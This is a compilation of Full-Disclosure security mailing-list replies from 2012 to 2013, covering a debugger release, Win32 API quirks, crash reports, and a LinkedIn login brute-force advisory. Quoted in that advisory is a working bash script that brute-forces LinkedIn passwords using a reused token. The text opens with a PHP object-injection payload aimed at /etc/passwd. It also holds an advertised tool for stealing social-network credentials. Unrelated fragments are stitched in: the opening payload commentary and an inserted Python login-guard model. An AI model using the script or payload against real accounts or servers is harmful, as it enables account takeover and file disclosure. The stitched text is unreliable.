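DOUBLE_BACKSLASH = b'O:9:"ZipWriter":1:{S:10:"\\\\000*\\\\000strTemp";s:11:"/etc/passwd";}'
```

Unfiltered, both the raw-NUL and the S: hex-escaped payloads decode to a protected property; after the filter chain the hex-escaped one decodes to the public name 0*0strTemp and the other two are no longer valid serialized data, which is the post's argument in executable form.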
[Full-disclosure] WinAppDbg 1.5 is out!
What is WinAppDbg?
==================

The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment.

It uses ctypes to wrap many Win32 API calls related to debugging, and provides an object-oriented abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows.

The intended audience are QA engineers and software security auditors wishing to test / fuzz Windows applications with quickly coded Python scripts. Several ready to use utilities are shipped and can be used for these purposes.

Current features also include disassembling x86/x64 native code, debugging multiple processes simultaneously and producing a detailed log of application crashes, useful for fuzzing and automated testing.

What's new in this version?
===========================

In a nutshell...

* full 64-bit support (including function hooks!)
* added support for Windows Vista and above.
* database code migrated to SQLAlchemy, tested on:
  + MySQL
  + SQLite 3
  + Microsoft SQL Server
  should work on other servers too (let me know if it doesn't!)
* added integration with more disassemblers:
  + BeaEngine: http://www.beaengine.org/
  + Capstone: http://capstone-engine.org/
  + Libdisassemble: http://www.immunitysec.com/resources-freesoftware.shtml
  + PyDasm: https://code.google.com/p/libdasm/
* added support for postmortem (just-in-time) debugging
* added support for deferred breakpoints
* now fully supports manipulating and debugging system services
* the interactive command-line debugger is now launchable from your scripts (thanks Zen One for the idea!)
* more UAC-friendly, only requests the privileges it needs before any action
* added functions to work with UAC and different privilege levels, so it's now possible to run debugees with lower privileges than the debugger
* added memory search and registry search support
* added string extraction functionality
* added functions to work with DEP settings
* added a new event handler, EventSift, that can greatly simplify coding a debugger script to run multiple targets at the same time
* added new utility functions to work with colored console output
* several improvements to the Crash Logger tool
* integration with already open debugging sessions from other libraries is now possible
* improvements to the Process and GUI instrumentation functionality
* implemented more anti-antidebug tricks
* more tools and code examples, and improvements to the existing ones
* more Win32 API wrappers
* lots of miscellaneous improvements, more documentation and bugfixes as usual!

Where can I find WinAppDbg?
===========================

Project homepage:
-----------------
http://winappdbg.sourceforge.net/

Download links:
---------------
Windows installer (32 bits)
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5.win32.msi/download

Windows installer (64 bits)
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5.win-amd64.msi/download

Source code
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5.zip/download

Documentation:
--------------
Online
http://winappdbg.sourceforge.net/doc/v1.5/tutorial
http://winappdbg.sourceforge.net/doc/v1.5/reference

Windows Help
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-tutorial.chm/download
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-reference.chm/download

HTML format (offline)
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-tutorial.chm/download
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-reference.chm/download

PDF format (suitable for printing)
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-tutorial.pdf/download
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.5/winappdbg-1.5-reference.pdf/download

Acknowledgements
================

Acknowledgements go to Arthur Gerkis, Chris Dietrich, Felipe Manzano, Francisco Falcon, @Ivanlef0u, Jean Sigwald, John Hernandez, Jun Koi, Michael Hale Ligh, Nahuel Riva, Peter Van Eeckhoutte, Randall Walls, Thierry Franzetti, Thomas Caplin, and many others I'm probably forgetting, who helped find and fix bugs in the almost eternal beta of WinAppDbg 1.5! ;)
Re: [Full-disclosure] Defense in depth -- the Microsoft way (part 13): surprising and inconsistent behaviour, sloppy coding, sloppy QA, sloppy documentation
This may be a silly question, so I apologize in advance, but what would exactly be the advantage here? Using a NULL pointer is in most (if not all) those cases undocumented behavior to begin with. Unless I'm missing something, the problem is not so much with Win32 as it is with the C language in general...

On Sun, Nov 3, 2013 at 4:30 PM, Stefan Kanthak stefan.kant...@nexgo.de wrote:

Hi @ll,

the Win32 API is full of idiosyncrasies resp. surprising and inconsistent, poorly tested and documented behaviour.

Just to pick one: NULL pointer as string argument.

0. lstrlen(NULL)
   lstrcat(NULL, ...) and lstrcat(..., NULL)
   lstrcmp(NULL, ...) and lstrcmp(..., NULL)
   lstrcmpi(NULL, ...) and lstrcmpi(..., NULL)
   lstrcpy(NULL, ...) and lstrcpy(..., NULL)
   lstrcpyn(NULL, ..., 0) and lstrcpy(..., NULL, ...)
   do not yield an exception, but treat their NULL arguments like an empty string (when used as source), resp. return NULL (when used as destination).

1. wsprintf(NULL, ...) and wvsprintf(NULL, ...)
   wsprintf(..., NULL, ...) and wvsprintf(..., NULL, ...)
   yield an access violation in USER32.DLL.

2. CommandLineToArgvW(NULL, ...)
   yields an access violation in SHELL32.DLL.

3. CreateProcess(NULL, NULL, ...)
   CreateProcessAsUser(..., NULL, NULL, ...)
   CreateProcessWithLogonW(..., ..., ..., ..., NULL, NULL, ...)
   CreateProcessWithTokenW(..., ..., NULL, NULL, ...)
   yield an access violation in KERNEL32.DLL.

4. GetFileAttributes(NULL)
   does not yield an exception, but treats the NULL argument like an empty string.

5. GetBinaryType(NULL, ...)
   does not yield an exception, but treats the NULL argument like an empty string.

6. MessageBox(..., NULL, ...) and MessageBox(..., ..., NULL, ...)
   do not yield an exception, but treat the NULL argument like an empty string.

7. FatalAppExit(0, NULL)
   does not yield an exception, but treats the NULL argument like an empty string.

8. GetCurrentDirectory(..., NULL)
   returns an error if the buffer size (the argument shown as ... here) is sufficient to hold the result, else the required buffer size.

   GetTempPath(..., NULL)
   GetSystemDirectory(NULL, ...)
   GetSystemWindowsDirectory(NULL, ...)
   GetSystemWow64Directory(NULL, ...)
   GetWindowsDirectory(NULL, ...)
   GetComputerName(NULL, ...)
   yield an access violation in NTDLL.DLL resp. KERNEL32.DLL if the buffer size is sufficient to hold the result, else the required buffer size.

   GetUserName(NULL, ...)
   GetComputerObjectName(..., NULL, ...)
   do not yield an access violation, but return an error with GetLastError() == ERROR_INSUFFICIENT_BUFFER.

9. GetUserName(NULL, NULL)
   GetComputerName(NULL, NULL)
   yield an access violation in KERNEL32.DLL.

   GetComputerNameEx(..., NULL, NULL)
   GetComputerObjectName(..., NULL, NULL)
   do not yield an access violation, but return an error with GetLastError() == ERROR_INVALID_PARAMETER.

JFTR: only the documentation of the last function (see http://msdn.microsoft.com/en-us/library/ms724301.aspx) explicitly says about the value of the third argument "If lpBuffer is NULL, this parameter must be zero." and checks this constraint properly.

The expected behaviour in all cases is, however, to return an error with GetLastError() == ERROR_INVALID_PARAMETER or similar.

FIX: ALL interfaces of the Win32 API should^WMUST verify (ALL) their arguments properly before using them and return an appropriate, documented error code.

stay tuned
Stefan Kanthak
Re: [Full-disclosure] VLC media player MKV Parsing POC
On Wed, Jul 10, 2013 at 10:57 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote:

1. The crash you showed does not control eip (it's not a stack-based bof)

And? You still need to control EIP or the exploit doesn't, you know, actually work. :P

2. not even arbitrary memory (check further instructions)

You posted only one instruction and it's a read operation, proving nothing. You're either lazy or don't actually get what's going on.
Re: [Full-disclosure] SEC Consult SA-20130507-0 :: Multiple vulnerabilities in NetApp OnCommand System Manager
On Tue, May 7, 2013 at 9:56 AM, SEC Consult Vulnerability Lab resea...@sec-consult.com wrote:

To exploit these issues, the attacker must be authenticated as root.

???
Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)
I was suddenly reminded of this... http://www.quickmeme.com/meme/3qicaz/

On Sat, Apr 20, 2013 at 1:05 PM, Joxean Koret joxeanko...@yahoo.es wrote:

Oh, no, please not again. Are we going to talk one more fucking time about the ethics of 0-days? Please no.

Is a delay of a year before reporting to the vendor, acceptable?

Thanks, Paul

Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
Re: [Full-disclosure] Google's robots.txt handling
That paragraph says pretty much the exact opposite of what you understood.

Also, could we please stop refuting points nobody even made in the first place? OP never claimed this to be a vulnerability, nor ever said robots.txt is a proper security mechanism to hide files in public web directories. All OP said was the way robots.txt is indexed allows for some Google dorks to be made, and it may be a good idea to avoid that. Clearly it's not the discovery of the century, but it seems fairly reasonable to me... I don't get what all this fuss is about.

On Wed, Dec 12, 2012 at 12:18 PM, Christoph Gruber l...@guru.at wrote:

On 12.12.2012 at 00:23 Lehman, Jim jim.leh...@interactivedata.com wrote:

It is possible to use white listing for robots.txt. Allow what you want google to index and deny everything else. That way google doesn't make you a google dork target and someone browsing to your robots.txt file doesn't glean any sensitive files or folders. But this will not stop directory bruting to discover your publicly exposed sensitive data, that probably should not be exposed to the web in the first place.

Maybe I misunderstood something, but do you really think that sensitive data can be hidden in secret directories on publicly reachable web servers?

-- Christoph Gruber

By not reading this email you don't agree you're not in any way affiliated with any government, police, ANTI-Piracy Group, RIAA, MPAA, or any other related group, and that means that you CANNOT read this email. By reading you are not agreeing to these terms and you are violating code 431.322.12 of the Internet Privacy Act signed by Bill Clinton in 1995. (which doesn't exist)
Re: [Full-disclosure] Google's robot.txt handling
I think we can all agree this is not a vulnerability. Still, I have yet to see an argument saying why what the OP is proposing is a bad idea. It may be a good idea to stop indexing robots.txt to mitigate the faults of lazy or incompetent admins (Google already does this for many specific search queries) and there's not much point in indexing the robots.txt file for legitimate uses anyway.

On Tue, Dec 11, 2012 at 2:01 PM, Scott Ferguson scott.ferguson.it.consult...@gmail.com wrote:

If I understand the OP correctly, he is not stating that listing something in robots.txt would make it inaccessible, but rather that Google indexes the robots.txt files themselves, snipped

Well, um, yeah - I got that. So you are what, proposing that moving an open door back a few centimetres solves the (non) problem?

Take your proposal to its logical extension and stop all search engines (especially the ones that don't respect robots.txt) from indexing robots.txt. Now what do you do about Nutch or even some perl script that anyone can whip up in 2 minutes?

Security through obscurity is fine when coupled with actual security - but relying on it alone is just daft. Expecting the world to change so bad habits have no consequence is dangerously naive.

I suspect you're looking too hard at finding fault with Google - who are complying with the robots.txt. Read the spec. - it's about not following the listed directories, not about not listing the robots.txt.

Next you'll want laws against bad weather and furniture with sharp corners.

Don't put things you don't want seen to see in places that can be seen.

On Mon, Dec 10, 2012 at 8:19 PM, Scott Ferguson scott.ferguson.it.consulting () gmail com wrote:

From: Hurgel Bumpf l0rd_lunatic () yahoo com
Date: Mon, 10 Dec 2012 19:25:39 + (GMT)

Hi list,

i tried to contact google, but as they didn't answer my email, i do forward this to FD. This security feature is not clearly a google vulnerability, but exposes websites' information that is not really intended to be public.

Conan the bavarian

Your point eludes me - Google is indexing something which is publicly available. eg.:-

curl http://somesite.tld/robots.txt

So it seems the solution to the question you raise is, um, nonsensical. If you don't want something exposed on your web server *don't publish references to it*. The solution, which should be blindingly obvious, is don't create the problem in the first place. Password sensitive directories (htpasswd) - then they don't have to be excluded from search engines (because listing the inaccessible in robots.txt is redundant).

You must have missed the first day of web school.

Kind regards.
Re: [Full-disclosure] Full-Disclosure Digest, Vol 92, Issue 34 - 1. Microsoft Windows Help program (WinHlp32.exe) memory
Or do, and grab a bag of popcorn ;)

On Tue, Oct 30, 2012 at 4:29 PM, Peter Dawson slash...@gmail.com wrote:

Dont feed the trolls !

On Tue, Oct 30, 2012 at 11:21 AM, Mikhail A. Utin mu...@commonwealthcare.org wrote:

Normal way of doing security research business (for normal people of course) is to inform the vendor and discuss the issue. I would not describe further steps as they are well-known. Kaveh Ghaemmaghami aka (coolkaveh) is either driven by his/her ego or never read this list posts. Or both.

Mikhail Utin, CISSP

-----Original Message-----

Today's Topics:
1. Microsoft Windows Help program (WinHlp32.exe) memory corruption (kaveh ghaemmaghami)
2. Microsoft Paint 5.1 memory corruption (kaveh ghaemmaghami)

Hello list!

I want to warn you about Microsoft Windows Help program (WinHlp32.exe) memory corruption

Best Regards
Kaveh Ghaemmaghami aka (coolkaveh)
Re: [Full-disclosure] Microsoft Office Word 2010 Stack Overflow
stack overflow != stack buffer overflow

On Wed, Oct 24, 2012 at 3:41 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote:

Title : Microsoft Office Word 2010 Stack Overflow
Version : Microsoft Office professional Plus 2010
Date : 2012-10-23
Vendor: http://office.microsoft.com
Impact: Med/High
Contact : coolkaveh [at] rocketmail.com
Twitter : @coolkaveh
tested: XP SP3 ENG

###
Bug : StackOverflow during the handling of the doc files. A context-dependent attacker can execute arbitrary code.

(be0.59c): Stack overflow - code c0fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00032000 ebx= ecx=00032fe4 edx=24bc esi=008b8974 edi=0753e000
eip=316d458e esp=000380f0 ebp=000380f8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Microsoft Office\Office14\wwlib.dll -
wwlib+0x458e:
316d458e 8500 test dword ptr [eax],eax ds:0023:00032000=
0:000 !exploitable -v
eax=00032000 ebx= ecx=00032fe4 edx=24bc esi=008b8974 edi=0753e000
eip=316d458e esp=000380f0 ebp=000380f8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206
wwlib+0x458e:
316d458e 8500 test dword ptr [eax],eax ds:0023:00032000=
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL -
Exception Faulting Address: 0x316d458e
First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC0FD)
Faulting Instruction:316d458e test dword ptr [eax],eax
Basic Block:
316d458e test dword ptr [eax],eax
Tainted Input Operands: eax
316d4590 jmp wwlib+0x4585 (316d4585)
Exception Hash (Major/Minor): 0x7513030e.0x2d6c2e72
Stack Trace:
wwlib+0x458e
wwlib!GetAllocCounters+0x78520
wwlib!GetAllocCounters+0x90f89
wwlib!GetAllocCounters+0x134cf
wwlib!DllGetLCID+0x6451eb
wwlib!DllGetLCID+0x645c74
wwlib!DllGetLCID+0x29b461
wwlib!DllGetLCID+0x531d6
wwlib!DllGetLCID+0x2c1272
wwlib!DllGetLCID+0x141bf9
wwlib!DllGetLCID+0x1d1144
wwlib!DllGetLCID+0x1d05ae
MSPTLS!LsLwMultDivR+0x101e7
MSPTLS!LsLwMultDivR+0x10afb
MSPTLS!LsLwMultDivR+0x10c5e
MSPTLS!LsLwMultDivR+0x10ec8
MSPTLS!FsTransformBbox+0xe137
MSPTLS!LsLwMultDivR+0x24ac6
MSPTLS!LsLwMultDivR+0x27d0
MSPTLS!LsLwMultDivR+0x25470
MSPTLS!LsLwMultDivR+0x25642
MSPTLS!LsLwMultDivR+0x259ad
MSPTLS!LsLwMultDivR+0x2a64
MSPTLS!LsLwMultDivR+0x3201
MSPTLS!FsTransformBbox+0x74ae
MSPTLS!FsTransformBbox+0x7e28
MSPTLS!FsCreateSubpageFinite+0xad
wwlib!DllGetLCID+0x541fc
wwlib!DllGetLCID+0x54037
MSPTLS!LsLwMultDivR+0x4e92
MSPTLS!LsLwMultDivR+0x29070
MSPTLS!LsLwMultDivR+0x285b0
MSPTLS!LsLwMultDivR+0x5fa3
MSPTLS!LsLwMultDivR+0x6816
MSPTLS!FsTransformBbox+0xb8c1
MSPTLS!FsQueryTableObjFigureListWord+0x2a0
MSPTLS!LsLwMultDivR+0x101e7
MSPTLS!LsLwMultDivR+0x10afb
MSPTLS!LsLwMultDivR+0x10c5e
MSPTLS!LsLwMultDivR+0x10ec8
MSPTLS!FsTransformBbox+0xe137
MSPTLS!LsLwMultDivR+0x24ac6
MSPTLS!LsLwMultDivR+0x27d0
MSPTLS!LsLwMultDivR+0x25470
MSPTLS!LsLwMultDivR+0x25642
MSPTLS!LsLwMultDivR+0x259ad
MSPTLS!LsLwMultDivR+0x2a64
MSPTLS!LsLwMultDivR+0x3201
MSPTLS!FsTransformBbox+0x74ae
MSPTLS!FsTransformBbox+0x7e28
MSPTLS!FsCreateSubpageFinite+0xad
wwlib!DllGetLCID+0x1d07f0
MSPTLS!LsLwMultDivR+0x101e7
MSPTLS!LsLwMultDivR+0x10afb
MSPTLS!LsLwMultDivR+0x10c5e
MSPTLS!LsLwMultDivR+0x10ec8
MSPTLS!FsTransformBbox+0xe137
MSPTLS!LsLwMultDivR+0x24ac6
MSPTLS!LsLwMultDivR+0x27d0
MSPTLS!LsLwMultDivR+0x25470
MSPTLS!LsLwMultDivR+0x25642
MSPTLS!LsLwMultDivR+0x259ad
MSPTLS!LsLwMultDivR+0x2a64
MSPTLS!LsLwMultDivR+0x3201
Instruction Address: 0x316d458e
Description: Stack Overflow
Short Description: StackOverflow
Recommended Bug Title: Stack Overflow starting at wwlib+0x458e (Hash=0x7513030e.0x2d6c2e72)

##
Proof of concept poc.rar included.
Re: [Full-disclosure] Foxit Reader suffers from Division By Zero
On Sat, Sep 29, 2012 at 4:01 AM, kaveh ghaemmaghami kavehghaemmagh...@googlemail.com wrote:

Title: Foxit Reader suffers from Division By Zero
Version : 5.4.3.0920
Date : 2012-09-28
Vendor : http://www.foxitsoftware.com/
Impact : Med/High
Contact : coolkaveh [at] rocketmail.com
Twitter : @coolkaveh
tested : XP SP3

#
Bug : division by zero vulnerability during the handling of the pdf files. that will trigger a denial of service condition
#

(b34.f24): Integer divide-by-zero - code c094 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax= ebx= ecx= edx= esi= edi=
eip=00558c8c esp=0012f928 ebp= iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010246
*** ERROR: Module load completed but symbols could not be loaded for FoxitReader_Lib_Full.exe
FoxitReader_Lib_Full+0x158c8c:
00558c8c f7f7 div eax,edi
0:000 r;!exploitable -v;q
eax= ebx= ecx= edx= esi= edi=
eip=00558c8c esp=0012f928 ebp= iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010246
FoxitReader_Lib_Full+0x158c8c:
00558c8c f7f7 div eax,edi
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
Exception Faulting Address: 0x558c8c
First Chance Exception Type: STATUS_INTEGER_DIVIDE_BY_ZERO (0xC094)
Faulting Instruction:00558c8c div eax,edi
Basic Block:
00558c8c div eax,edi
Tainted Input Operands: ax, dx, eax, edi
00558c8e cmp dword ptr [esp+3ch],eax
Tainted Input Operands: eax
00558c92 jae foxitreader_lib_full+0x158f06 (00558f06)
Tainted Input Operands: CarryFlag
Exception Hash (Major/Minor): 0x6461647c.0x64616453
Stack Trace:
FoxitReader_Lib_Full+0x158c8c
Instruction Address: 0x00558c8c
Description: Integer Divide By Zero
Short Description: DivideByZero
Recommended Bug Title: Integer Divide By Zero starting at FoxitReader_Lib_Full+0x00158c8c (Hash=0x6461647c.0x64616453)

#
Proof of concept .pdf included.
Re: [Full-disclosure] LinkedIn CSRF: Login Brute Force
It's a captcha bypass, not a CSRF as claimed. I'm also not quite sure if the captcha has really been bypassed at all, as the blog post in Spanish says you have to enter it manually from time to time...

> If LinkedIn gives us trouble with the captcha, what we have to do is log in via the web with a valid account, capture the token again and try again with that token.

This line is quite funny:

> Note: LinkedIn was notified about this vulnerability two weeks ago, but they did not respond.

(LinkedIn has been notified two weeks ago, but they never responded). The comments are pretty clueless too.

On Thu, May 17, 2012 at 7:50 PM, Julius Kivimäki julius.kivim...@gmail.com wrote:

> Where's the csrf? All I see here is a useless bruteforce attack.
>
> 2012/5/17 Fernando A. Lagos B. ferna...@zerial.org
>
>> LinkedIn uses a Token in the login form which can be used many times for different usernames. You can do it using the same IP or different IPs; the token will not be verified.
>>
>> I. Step by step
>> ===
>> 1). Login into your LinkedIn account and capture the sourceAlias and csrfToken variables (example: sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi csrfToken=ajax%3A626530304817496)
>> 2). Use the Token to login into another account:
>> https://www.linkedin.com/uas/login-submit?csrfToken=ajax%3A626530304817496session_key=someb...@somedomain.comsession_password=ANY_PASSWORDsession_redirect=sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoisource_app=trk=secureless
>> session_key is the username and session_password is the password.
>> 3). The password (session_password) is not correct if the requested URL returns "The email address or password you provided does not match our records"; otherwise the password is correct.
>>
>> II. PoC
>> ===
>> 1). The wordlist (filename: w)
>> [zerial@belcebu ~]$ cat w
>> asdfgh
>> zxcvbnm
>> 1234567
>> 0987654
>> 12345698
>> 456_4567
>> 123456qwert
>> qwsdcv
>> 12wedfgh
>> 123456qwerty
>> 12345qwei
>> 112233
>> [zerial@belcebu ~]$
>> 2). Executing the script:
>> [zerial@belcebu ~]$ sh linkedin.sh pa...@zerial.org w
>> Password found: qwsdcv
>> [zerial@belcebu ~]$
>> This is the correct password for this test user.
>>
>> III. Script
>> ===
>> #!/bin/bash
>> #
>> # usage: ./linkedin.sh usern...@domain.com wordlist
>> #
>> TOKEN=ajax%3A626530304817496
>> sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi
>> if [ ! -f $2 ]; then
>>   echo file $2 does not exists
>>   exit
>> fi
>> _USR=$1
>> for _PWD in $(cat $2); do
>>   if [ $(echo -n $_PWD|wc -c) -lt 6 ]; then
>>     echo Ignoring $_PWD (must be grather than 6 chars); continue
>>   fi
>>   wget -o /dev/null -O - https://www.linkedin.com/uas/login-submit?csrfToken=$TOKENsession_key=$_USRsession_password=$_PWDsession_redirect=sourceAlias=$sourceAliassource_app=trk=secureless;|grep 'The email address or password you provided does not match our records\|captcha' /dev/null
>>   if [ $? -eq 1 ]; then
>>     echo Password found: $_PWD; exit;
>>   fi
>> done
>> echo Password NOT found. Try later.
>> #EOF
>>
>> More info (in Spanish): http://blog.zerial.org/seguridad/vulnerabilidad-en-linkedin-permite-obtencion-de-contrasenas/
>>
>> cheers,
>> --
>> Fernando A. Lagos Berardi
>> Seguridad Informatica
>> GNU/Linux User #382319
>> Blog: http://blog.zerial.org
>> Jabber: zer...@jabberes.org
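The two server-side gaps the thread picks apart are a csrfToken that is accepted for any username from any IP, and a captcha that only appears now and then. The model below, added here as example code that is not LinkedIn's, binds the token to the session that issued it and counts failures per target account, so a guessing run spread over many sessions and addresses still hits the captcha wall; LoginGuard and guess_run are this example's own names, and passwords sit in a plain dict only to keep the model short.

```python
"""Token-to-session binding and per-account throttling for a login endpoint."""
import hmac
import secrets
from collections import defaultdict


class LoginGuard:
    """Toy login endpoint with the two controls the advisory found missing."""

    def __init__(self, captcha_after=3, pepper=None):
        self.captcha_after = captcha_after
        # Server-side secret used to derive per-session tokens (constructed).
        self.pepper = pepper or secrets.token_bytes(32)
        self.failures = defaultdict(int)   # username -> consecutive failures
        self.users = {}                    # username -> password (demo only)

    def token_for(self, session_id):
        """Token = HMAC(session id): a token lifted from another session fails."""
        return hmac.new(self.pepper, session_id.encode(), "sha256").hexdigest()

    def attempt(self, session_id, token, username, password, captcha_ok=False):
        """Return 'bad_token', 'captcha_required', 'ok' or 'bad_password'."""
        if not hmac.compare_digest(token, self.token_for(session_id)):
            return "bad_token"
        # Counted per target account, so rotating source IPs does not help.
        if self.failures[username] >= self.captcha_after and not captcha_ok:
            return "captcha_required"
        if hmac.compare_digest(self.users.get(username, ""), password):
            self.failures[username] = 0
            return "ok"
        self.failures[username] += 1
        return "bad_password"


def guess_run(guard, username, words):
    """Replay the thread's loop against the model: one guess per request,
    each from a fresh session holding its own valid token. Returns outcomes."""
    outcomes = []
    for i, word in enumerate(words):
        sid = f"session-{i}"
        outcomes.append(guard.attempt(sid, guard.token_for(sid), username, word))
    return outcomes


if __name__ == "__main__":
    g = LoginGuard()
    g.users["someb...@somedomain.com"] = "qwsdcv"   # constructed test account
    print(guess_run(g, "someb...@somedomain.com",
                    ["asdfgh", "zxcvbnm", "1234567", "qwsdcv", "112233"]))
```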
Re: [Full-disclosure] [New tool] - Exploit Pack - Web Security
The exploitpack.com website and the video have been removed... (maybe we can call this a legally induced denial of service vulnerability?)

On Tue, Apr 24, 2012 at 12:31 PM, Michele Orru antisnatc...@gmail.com wrote:

> I'm also wondering if your tool is a clone of our BeEF or not :D
>
> Cheers
> antisnatchor
>
> On Tue, Apr 24, 2012 at 11:25 AM, Jerome Athias jer...@netpeas.com wrote:
>
>> Hi,
>>
>> I think that people here would be more interested in the (new?) techniques you're using in your tool than in your own (not documented?) implementation.
>> i.e.: are you using the MSF browser autopwn technique for browser control?
>> (Or will we have to spend 3 days each to review and test your tool?)
>>
>> My 2 cts
>> /JA
>>
>> On 23/04/2012 21:52, runlvl wrote:
>>
>>> Exploit Pack - Web Security Edition
>>> This tool allows you to take control of remote browsers, steal social network credentials, obtain persistence on it, DDoS and more.
>>> Demo: http://www.youtube.com/watch?v=B_AYyRFNokI
>>> Main features:
>>> - Hacking of Gmail, Yahoo, Facebook, Live, Linkedin
>>> - Session persistence
>>> - 0day exploits included
>>> - Remote browser control
>>> - DDoS by creating botnets
>>> - Launch remote exploits
>>> - Steal credentials
>>> Questions? supp...@exploitpack.com
>>> Official site: http://exploitpack.com
>>
>> --
>> Jerome Athias - NETpeas
>> VP, Director of Software Engineer
>> Palo Alto - Paris - Casablanca
>> www.netpeas.com
>> - Stay updated on Security: www.vulnerabilitydatabase.com
>> "The computer security is an art form. It's the ultimate martial art."
>
> --
> /antisnatchor
Re: [Full-disclosure] [New tool] - Exploit Pack - Web Security
s/clone/theft/

On Tue, Apr 24, 2012 at 12:31 PM, Michele Orru antisnatc...@gmail.com wrote:

> I'm also wondering if your tool is a clone of our BeEF or not :D
>
> Cheers
> antisnatchor
Re: [Full-disclosure] The Mystery of the Duqu Framework
On Tue, Mar 20, 2012 at 12:50 AM, Sanguinarious Rose sanguiner...@occultusterra.com wrote:

> Here let me re-quote my email for *prosperity*

I don't think that word means what you think it means.
Re: [Full-disclosure] ms12-020 new poc
Another lame backdoor.

On Sat, Mar 17, 2012 at 6:45 AM, yuri goncalves soares y...@bsd.com.br wrote:

> Another POC.
> http://pastebin.com/GM4sHj9t
Re: [Full-disclosure] Patator - new multi-purpose brute-forcing tool
Indeed. It could also be very fast and not use threads at all. But IMO it's much harder to write an efficient multithreaded program in Python than in C; at the very least you need a good understanding of the inner workings of the Python interpreter. I find it a bit suspicious in general that a Python program can outperform a pure C program just like that. It's not impossible, but I think I'll reserve my judgement on this until some benchmarks are published.

On Thu, Feb 23, 2012 at 1:36 PM, Andres Riancho andres.rian...@gmail.com wrote:

> Grandma,
>
> On Thu, Feb 23, 2012 at 2:52 AM, Grandma Eubanks tborla...@gmail.com wrote:
>
>> Multiprocessing is quite a bit faster than utilizing threads (this should be obvious as threads are GIL locked, while multi-processing can be spread amongst cores with the kernel's scheduler).
>
> That's not always true. If the process is network bound (which seems to be the case with a bruteforce tool), then having multiprocessing will not necessarily increase speed. If the software was well written, it can be very fast and use Python threads.
>
>> On Wed, Feb 22, 2012 at 6:51 PM, Nate Theis ntth...@gmail.com wrote:
>>
>>> You might look into PyPy for a speed boost: http://pypy.org
>>>
>>> On Feb 22, 2012 6:43 AM, lanjelot lanje...@gmail.com wrote:
>>>
>>>> Hello FD,
>>>>
>>>> Released two months ago, and downloaded a few thousand times since, I wanted to share with you a new multi-purpose brute-forcing tool named Patator (http://code.google.com/p/patator/).
>>>>
>>>> I am posting here because I would like to get more feedback from people using it, so feel free to fire me an email if you have any queries, or rather use the issue tracker on the patator project page.
>>>>
>>>> To put it bluntly, I just got tired of using Medusa, Hydra, ncrack, metasploit auxiliary modules, nmap NSE scripts and the like because:
>>>> - they either do not work or are not reliable (got me false negatives several times in the past)
>>>> - they are slow (not multi-threaded or not testing multiple passwords within the same TCP connection)
>>>> - they lack very useful features that are easy to code in Python (e.g. interactive runtime)
>>>>
>>>> Basically you should give Patator a try once you get disappointed by Medusa, Hydra or other brute-forcing tools and are about to code your own small script, because Patator will allow you to:
>>>> - Not write the same code over and over, due to its modular design and flexible usage
>>>> - Run multi-threaded
>>>> - Benefit from useful features such as the interactive runtime commands, automatic response logging, etc.
>>>>
>>>> Currently Patator supports the following modules:
>>>> - ftp_login : Brute-force FTP
>>>> - ssh_login : Brute-force SSH
>>>> - telnet_login : Brute-force Telnet
>>>> - smtp_login : Brute-force SMTP
>>>> - smtp_vrfy : Enumerate valid users using the SMTP 'VRFY' command
>>>> - smtp_rcpt : Enumerate valid users using the SMTP 'RCPT TO' command
>>>> - http_fuzz : Brute-force HTTP/HTTPS
>>>> - pop_passd : Brute-force poppassd (not POP3)
>>>> - ldap_login : Brute-force LDAP
>>>> - smb_login : Brute-force SMB
>>>> - mssql_login : Brute-force MSSQL
>>>> - oracle_login : Brute-force Oracle
>>>> - mysql_login : Brute-force MySQL
>>>> - pgsql_login : Brute-force PostgreSQL
>>>> - vnc_login : Brute-force VNC
>>>> - dns_forward : Forward lookup subdomains
>>>> - dns_reverse : Reverse lookup subnets
